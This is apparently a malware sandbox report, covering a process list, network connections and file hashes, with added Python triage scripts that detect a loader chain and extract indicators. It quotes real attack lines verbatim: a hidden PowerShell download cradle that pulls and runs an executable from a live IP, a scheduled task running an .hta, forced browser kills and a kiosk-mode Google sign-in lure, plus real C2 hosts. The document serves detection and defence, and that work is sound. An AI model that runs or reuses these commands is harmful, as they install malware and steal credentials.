C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 500

C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 512

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3728 -s 1032
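The process list above records the whole loader chain in command lines: the sample registers a scheduled task that runs mshta against an .hta in %TEMP% every 25 minutes, the .hta launches a hidden PowerShell download cradle, the downloaded stage drops further payloads, and one of them kills five browsers and reopens Firefox in kiosk mode on a page whose query string carries a Google sign-in URL. One detail worth noticing in the PowerShell line is that the drop path is built as $env:temp+'NAME' with no backslash, so the file lands beside the Temp folder as ...\AppData\Local\TempZHNW....EXE, which is exactly the path the report shows for the second stage; a file named Temp* directly under AppData\Local is a cheap hunting pivot. The following Python is an added triage example written for this page, not part of the sandbox report or of any of the families it names; it runs a handful of rules over those command lines. The malicious lines in the sample are copied verbatim from the Processes section, the two benign lines at the end are constructed to show the rules stay quiet on ordinary use, and the rule names, the user-writable path list and the ATT&CK mapping in the docstrings are the example's own.

```python
"""Added triage example: flag the loader chain shown in this report's
process list (schtasks -> mshta -> PowerShell cradle, browser kill + kiosk)."""
import re
from dataclasses import dataclass, field

# Malicious lines copied from the Processes section; the last two are
# constructed benign lines (not from the report) used as negative cases.
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\cmd.exe /c schtasks /create /tn 7p7BqmaXq2n /tr "mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta" /sc minute /mo 25 /ru "Admin" /f',
    r'mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta',
    r'schtasks /create /tn 7p7BqmaXq2n /tr "mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta" /sc minute /mo 25 /ru "Admin" /f',
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;''',
    r'taskkill /F /IM firefox.exe /T',
    r'taskkill /F /IM chrome.exe /T',
    r'taskkill /F /IM msedge.exe /T',
    r'taskkill /F /IM opera.exe /T',
    r'taskkill /F /IM brave.exe /T',
    r'"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking',
    r'schtasks /create /tn NightlyBackup /tr "C:\Program Files\Backup\backup.exe" /sc daily /st 02:00',
    r'powershell.exe -Command "Get-Process | Out-File C:\Temp\procs.txt"',
]

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "opera.exe", "brave.exe"}
SCRIPT_HOSTS = ("mshta", "powershell", "wscript", "cscript", "rundll32", "regsvr32")
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)


@dataclass
class Finding:
    rule: str
    cmdline: str
    details: dict = field(default_factory=dict)


def check_schtasks(cmd):
    """T1053.005: task whose action runs a script host from a user-writable path."""
    m = re.search(r'schtasks\s+/create\b.*?/tr\s+"([^"]+)"', cmd, re.I)
    if not m:
        return None
    action = m.group(1)
    if not (any(h in action.lower() for h in SCRIPT_HOSTS) and USER_WRITABLE.search(action)):
        return None
    tn = re.search(r"/tn\s+(\S+)", cmd, re.I)
    sched = re.search(r"/sc\s+(\w+)(?:\s+/mo\s+(\d+))?", cmd, re.I)
    return Finding("scheduled_task_lolbin_user_path", cmd, {
        "task_name": tn.group(1) if tn else None,
        "action": action,
        "interval": f"every {sched.group(2) or 1} {sched.group(1).lower()}(s)" if sched else None,
    })


def check_mshta(cmd):
    """T1218.005: mshta itself executing an .hta from a user-writable location."""
    m = re.match(r'\s*"?(?:[^"\s]*\\)?mshta(?:\.exe)?"?\s+"?([^"\s]+\.hta)', cmd, re.I)
    if m and USER_WRITABLE.search(m.group(1)):
        return Finding("mshta_user_writable_hta", cmd, {"hta": m.group(1)})
    return None


def check_powershell(cmd):
    """T1059.001 + T1105: PowerShell fetches a URL to disk and launches it."""
    if "powershell" not in cmd.lower():
        return None
    url = re.search(r"""https?://[^\s'"]+""", cmd, re.I)
    fetch = re.search(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b", cmd, re.I)
    run = re.search(r"Start-Process|Invoke-Expression|\biex\b", cmd, re.I)
    if not (url and fetch and run):
        return None
    details = {"url": url.group(0),
               "hidden": bool(re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I))}
    # Drop path built as $env:temp+'NAME': with no leading separator the file
    # lands next to %TEMP% (…\Local\TempNAME), the odd path seen in this report.
    m = re.search(r"\$env:(\w+)\s*\+\s*'([^']+)'", cmd, re.I)
    if m:
        var, tail = m.groups()
        details["drop_path"] = f"%{var.upper()}%{tail}"
        details["path_separator_missing"] = not tail.startswith(("\\", "/"))
    return Finding("powershell_download_cradle", cmd, details)


def check_kiosk(cmd):
    """Browser forced into kiosk mode on a page carrying a nested sign-in URL."""
    m = re.search(r'--kiosk\s+"?([^\s"]+)', cmd, re.I)
    if not m:
        return None
    url = m.group(1)
    nested = len(re.findall(r"https?://", url, re.I)) > 1
    signin = bool(re.search(r"accounts\.google\.com|signin|login", url, re.I))
    if not (nested or signin):
        return None
    exe = re.match(r'"?([^"]+?\.exe)"?', cmd, re.I)
    return Finding("kiosk_mode_credential_prompt", cmd, {
        "browser": exe.group(1).rsplit("\\", 1)[-1].lower() if exe else None,
        "url": url, "nested_url": nested})


def killed_browsers(cmdlines):
    """Browser image names passed to taskkill /IM across all lines."""
    hits = []
    for cmd in cmdlines:
        m = re.search(r"\btaskkill\b.*?/IM\s+(\S+)", cmd, re.I)
        if m and m.group(1).lower() in BROWSERS:
            hits.append(m.group(1).lower())
    return hits


def scan(cmdlines):
    """Per-line rules first, then the cross-line browser-kill rule."""
    findings = []
    for cmd in cmdlines:
        for check in (check_schtasks, check_mshta, check_powershell, check_kiosk):
            f = check(cmd)
            if f:
                findings.append(f)
    killed = sorted(set(killed_browsers(cmdlines)))
    if len(killed) >= 2:
        findings.append(Finding("mass_browser_termination", "taskkill (aggregate)", {"browsers": killed}))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"[{f.rule}] {f.details}")
```

The scheduled-task rule fires twice here because the report records both the cmd.exe wrapper and the schtasks.exe child; deduplicate on task name if you feed a full process tree. The browser-kill rule is deliberately cross-line: a single taskkill of one browser is routine, five in a row immediately before a kiosk-mode launch is not.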

Network

Country Destination Domain Proto
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.32.1:443 exarthynature.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.80.1:443 croprojegies.run tcp
RU 45.93.20.28:80 45.93.20.28 tcp
N/A 127.0.0.1:49503 tcp
N/A 127.0.0.1:49510 tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.179.238:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 142.250.179.238:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
GB 216.58.213.14:443 consent.youtube.com udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
NL 45.154.98.175:6969 tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
GB 142.250.200.14:443 play.google.com udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
NL 2.18.121.79:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com udp
US 8.8.8.8:53 r3---sn-aigl6n6s.gvt1.com udp
GB 173.194.3.72:443 r3---sn-aigl6n6s.gvt1.com tcp
US 8.8.8.8:53 r3.sn-aigl6n6s.gvt1.com udp
US 8.8.8.8:53 r3.sn-aigl6n6s.gvt1.com udp
GB 173.194.3.72:443 r3.sn-aigl6n6s.gvt1.com udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 172.67.189.66:443 moderzysics.top tcp
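Most rows in the table above are not indicators: the 8.8.8.8:53 rows are the sandbox resolver, the 127.0.0.1 rows are local socket pairs, and the Mozilla, Google and YouTube traffic is what the kiosk-mode Firefox launch generates on its own. What is left is a short list of direct-IP hosts (176.113.115.7 is the one the PowerShell cradle fetched random.exe from), a set of Cloudflare-fronted throwaway domains, and a cluster of names that were resolved but never contacted. The following Python is an added example written for this page, not part of the report: it parses rows in the table's format into an IOC list and separates contacted endpoints from resolved-only names and browser noise. The sample rows are copied from the Network section (a representative subset); the noise suffix list is an analyst assumption, and steamcommunity.com is intentionally left off it because Vidar-family stealers retrieve their C2 address from a public Steam profile page, so a Steam connection from a non-browser process belongs in the chain rather than in the noise.

```python
"""Added example: turn this report's Network table into an IOC list."""

# Rows copied from the Network section of this report (representative subset).
SAMPLE_NETWORK_TABLE = """
Country Destination Domain Proto
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.32.1:443 exarthynature.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
RU 45.93.20.28:80 45.93.20.28 tcp
N/A 127.0.0.1:49503 tcp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com tcp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
NL 45.154.98.175:6969 tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 moderzysics.top udp
US 172.67.189.66:443 moderzysics.top tcp
"""

# Analyst assumption: background traffic of the Firefox launch, not IOCs.
NOISE_SUFFIXES = ("mozilla.net", "mozilla.com", "mozgcp.net", "mozaws.net",
                  "google.com", "youtube.com", "gvt1.com", "openh264.org",
                  "akamai.net", "getpocket.com")


def parse_rows(text):
    """Parse 'Country Destination Domain Proto' rows; Domain may be absent."""
    rows = []
    for line in text.strip().splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] == "Country":
            continue
        country, dest, proto = parts[0], parts[1], parts[-1].lower()
        domain = parts[2] if len(parts) == 4 else ""
        ip, _, port = dest.rpartition(":")
        if domain == ip:  # the table repeats the IP when no name was involved
            domain = ""
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def is_noise(domain):
    d = domain.lower()
    return any(d == s or d.endswith("." + s) for s in NOISE_SUFFIXES)


def extract_iocs(rows):
    """Split rows into contacted endpoints, resolved-only names and noise."""
    contacted, resolved, noise = {}, set(), set()
    for r in rows:
        if r["port"] == 53 and r["proto"] == "udp":  # DNS lookup, not a contact
            if r["domain"]:
                (noise if is_noise(r["domain"]) else resolved).add(r["domain"])
            continue
        if r["ip"].startswith("127."):  # local socket pairs
            continue
        if r["domain"] and is_noise(r["domain"]):
            noise.add(r["domain"])
            continue
        key = f'{r["ip"]}:{r["port"]}'
        e = contacted.setdefault(key, {"country": r["country"], "domains": set(),
                                       "protos": set(), "hits": 0})
        if r["domain"]:
            e["domains"].add(r["domain"])
        e["protos"].add(r["proto"])
        e["hits"] += 1
    named = {d for e in contacted.values() for d in e["domains"]}
    return {"contacted": contacted,
            "dns_only": sorted(resolved - named),
            "noise": sorted(noise)}


def render(iocs):
    """Plain-text IOC list; endpoints reached without a name are flagged."""
    lines = []
    for key, e in iocs["contacted"].items():
        names = ",".join(sorted(e["domains"])) or "<direct IP>"
        protos = "/".join(sorted(e["protos"]))
        lines.append(f'{key:22} {e["country"]:3} {protos:7} x{e["hits"]:<3} {names}')
    for d in iocs["dns_only"]:
        lines.append(f"{'(resolved only)':22} {'':3} {'dns':7} {'':4} {d}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(render(extract_iocs(parse_rows(SAMPLE_NETWORK_TABLE))))
```

Resolved-only names are worth keeping: a loader that walks a list of domains until one answers leaves exactly this pattern, and the dead ones can be registered later. Direct-IP entries with no name are the hard-coded hosts and the first candidates for blocking.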

Files

C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta

MD5 2b2ae07bb23617f2f0d316dcce383b8c
SHA1 839721c2ad4a73cfcf76f2514a0b7505008a6f1a
SHA256 e62d1fe3098e2a44c13f031271badc86fa075eb0d17c7b7814b43679c4bab7ae
SHA512 2c281088e14d3ce4d07dd821ddfaf6d0275650bc2845d933bef54c9ba3d28caa6a62b9aa13bc7d06d5a303f341325759065eb35156296d7cbda850b6f96a025b

C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE

MD5 b5db83c03a37b4cd4746a6080133e338
SHA1 edf3f7e5c3bda89e1382df8f7d0443783426c834
SHA256 8bf5d7ea5c499425488b94f13497a5c3b02997f00ec88fad1b577736fab245df
SHA512 e99da7c87f01dc7459b57d0ce3df799aeb22738840f047c56fb319dc8edddc00ae303ca02916b4b09690df3ff14d559fac44b3e627c6b24498338cfa290fc313

memory/2084-13-0x00000000064D0000-0x000000000698F000-memory.dmp

memory/3068-14-0x0000000000FB0000-0x000000000146F000-memory.dmp

memory/2352-30-0x00000000000A0000-0x000000000055F000-memory.dmp

memory/3068-28-0x0000000000FB0000-0x000000000146F000-memory.dmp

memory/2352-32-0x00000000000A0000-0x000000000055F000-memory.dmp

memory/2352-33-0x00000000000A0000-0x000000000055F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe

MD5 d054bcb257edeee50293394229ab1c67
SHA1 80f84013bdc91aa820a0534a297be285e9f0c9f8
SHA256 b4f1440eeb98201163dbc847c76b499538b6e5c05ab178ee255abe190cc7e26e
SHA512 ac52e358cd513783e130c2fd34da7d71bb25039ef4da81921b53be24b21cd5c4d83e0e000c1701b4eec9b9cf0fdd5b14a0801e240ef67efaa60cfb5a100d5f26

memory/2352-49-0x0000000006790000-0x0000000007192000-memory.dmp

memory/2352-51-0x0000000006790000-0x0000000007192000-memory.dmp

memory/3044-50-0x00000000012E0000-0x0000000001CE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/984-65-0x0000000000BD0000-0x0000000000C48000-memory.dmp

memory/1548-70-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1548-74-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1548-79-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1548-78-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1548-76-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1548-72-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1548-68-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1548-81-0x0000000000400000-0x0000000000465000-memory.dmp

memory/2352-87-0x00000000000A0000-0x000000000055F000-memory.dmp

memory/2352-93-0x0000000006790000-0x0000000007192000-memory.dmp

memory/3044-94-0x00000000012E0000-0x0000000001CE2000-memory.dmp

memory/3044-95-0x00000000012E0000-0x0000000001CE2000-memory.dmp

memory/2352-96-0x0000000006790000-0x0000000007192000-memory.dmp

memory/1412-97-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1412-99-0x0000000000400000-0x000000000042F000-memory.dmp

memory/3044-98-0x00000000012E0000-0x0000000001CE2000-memory.dmp

memory/1412-103-0x0000000010000000-0x000000001001C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe

MD5 5d153f73ce1b6a907cf87ddb04ba12b2
SHA1 bfda9ee8501ae0ca60f8e1803efea482085bf699
SHA256 2af376f6a5d706982e3ac08f54d737c4c203bdc2c2c1cbf5f9fc9d4a3a775b2c
SHA512 0f6ef7ff7db227bec5d2a1dcef461313cde66b5ec38f5efd377e533ef15d87eb4aef6cf387ee7c7b63d1142a883bb18577f97dec0dcd818b93891e87f499c102

memory/2352-116-0x00000000000A0000-0x000000000055F000-memory.dmp

memory/2352-123-0x0000000006790000-0x00000000073E1000-memory.dmp

memory/2352-124-0x0000000006790000-0x00000000073E1000-memory.dmp

memory/2552-125-0x0000000000A30000-0x0000000001681000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CXRG2YQS\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe

MD5 8538c195a09066478922511ea1a02edf
SHA1 15e8910df845d897b4bb163caef4c6112570855b
SHA256 d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96
SHA512 60b2c66006b226140f7bf50c94c65088081b311ee92c6dea376a1349ff2380e0ce053a84b2df3be8a54bf7f7bb76f1add8417f4f1bf2fb0681e008cbd5b1725c

memory/2352-144-0x0000000006790000-0x0000000006C3B000-memory.dmp

memory/2352-147-0x0000000006790000-0x00000000073E1000-memory.dmp

memory/2352-148-0x0000000006790000-0x00000000073E1000-memory.dmp

memory/2552-149-0x0000000000A30000-0x0000000001681000-memory.dmp

memory/2352-151-0x00000000000A0000-0x000000000055F000-memory.dmp

memory/2552-152-0x0000000000A30000-0x0000000001681000-memory.dmp

memory/1828-155-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2552-154-0x0000000000A30000-0x0000000001681000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\Tar8EB0.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

memory/2384-230-0x0000000000170000-0x000000000061B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe

MD5 2a48e7b047c5ff096c6dce52d4f26dbb
SHA1 e0d61e10b27131b1c34ade44d1a2117afd2cf099
SHA256 42642893c6a6af226aab5b2cce0875e7affebf7d1001146ddd90234d4c01492d
SHA512 75965d3aa7cda41ecc11f87b1ac2b12283d58650f5b96f2af560aff859ca74c0c0cb26dfc765b4d8318291d8f89fdbb338fb71ddf3f4b63389aedb5e2106165a

memory/2352-248-0x0000000006790000-0x0000000006C3B000-memory.dmp

memory/2648-254-0x00000000012B0000-0x00000000015C4000-memory.dmp

memory/2352-257-0x00000000000A0000-0x000000000055F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe

MD5 338a31056b3b81d48a292a7bf9af67c7
SHA1 f5061e3583ba604b25e316f12fc58f40238d44b4
SHA256 cd1c085a07dc81e4305c2b9ee57e5c0433858c97cb20b1743cf44931c431ccea
SHA512 5bc7823cbd1ab6fa963df8f152d8b6de56af41159f3a736d147f1e5b4dcba3007319e2d2fb13e97f1e8b3cce3ab0d17e31d541be1ab53f8bd05a42316a940abc

memory/1676-276-0x0000000001330000-0x00000000019B7000-memory.dmp

\Users\Admin\AppData\Local\Temp\NBJ5wfAV8NCe\Y-Cleaner.exe

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe

MD5 c0caf5a901b162b6792eab9697827b5d
SHA1 d078ba4ad104c40bf5f2c8afda1cbdf4afc55a84
SHA256 28c182baea1726c3e851405b13f130e02817099758abab86ca9cdc3607b9f89f
SHA512 3fba4eb7a2bc21fc24a6e29495e598efc5f208db030b13de8af43a392a93e3a920e4e8e4b68e10d4dc4a0e8779401ca738172ca9cba2ddc2246854c41a8a58a5

memory/2352-299-0x00000000000A0000-0x000000000055F000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\a235d1f1-3c99-4844-9c4d-ef664963c167

MD5 3b911f40561733efbb7ef1f8b0061797
SHA1 e989039184feb69005e0d0cbffe050c6cba4baaf
SHA256 8e8babdfc7de4c3fd983f4a5cfb1a87638eaff965de8471dea78adfce0208ee3
SHA512 e9954c282831a29676acbb091c1ccb5badeba1c98a727d6c57e267e3e4948ce309189ef5edf9196b9ae1cf5e0f6d75e45ea6d69f1c9db518b348f616137e0a7f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\db\data.safe.bin

MD5 6cb779084a4a54c5dfae4f07b5ed7d02
SHA1 8d8e7d52a023403943054af1fabd139bbdfbbc57
SHA256 861578c8f0fbbcfd69a1b342bc26c0f5289ce7b050c9830123f222da7875c101
SHA512 ec3b83b8678c529eb8c44afe3c24be87068d98a3e07c62ffa0f9f625c4cbf6f725100d793a7d33f745c718bc849b760ec11ebfca92dc80ae41078591f342cf35

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\83d89f60-d287-48c7-bf80-0c36061ff33d

MD5 711bdc4b9effd3ac9f20f20b49aff77d
SHA1 b8bdf43293526c6ca5c061afafb8879f489a8108
SHA256 46242560590ee1c7099c56cfe3512807686ad578365e43e8f750b4a3acdc8101
SHA512 f7400df4cd75a251e8fd88185a6c002c5c0af36b80a3cbb16ebbafff7586829fc9ad8e1dabd3f0105e0f8c31c3f8678921079c5100d90e2fa79a5468796730cd

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp

MD5 29840b80836cf007cb87c5155f230588
SHA1 00a0dcc50281e0fcbf6cfbc06647a19e3afc565c
SHA256 9967b9a45f6f608bdc8c673518b4df82c01d0c5bd9dc77ccabdaef0ff3fe90f1
SHA512 6e0ded07a22baa41269d93e053e6406ac7bc525c04f1f510b4c64e18bf321181dfa49fb525bde210b5d1742ee94ef350a16dbe04458fdcaad5a17649b2a08617

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe

MD5 8043b20e32ff2f0c75e9a3eed0c4bf07
SHA1 5464aa1bc2a91c64cd8c4cbbb6970e8189c158a3
SHA256 69a487512dfb97f08d068d0f9dd3924f42bef46bddd79112cb206b00fc16713e
SHA512 35639c6aad3dd25f606ca72ad108f774b083fa62677772242d357d59add9bba1dc85532d58ae67277d90c04dd4a5189548ca331fe93ee086c31cacbf11b8a18c

memory/2972-453-0x00000000002E0000-0x0000000000738000-memory.dmp

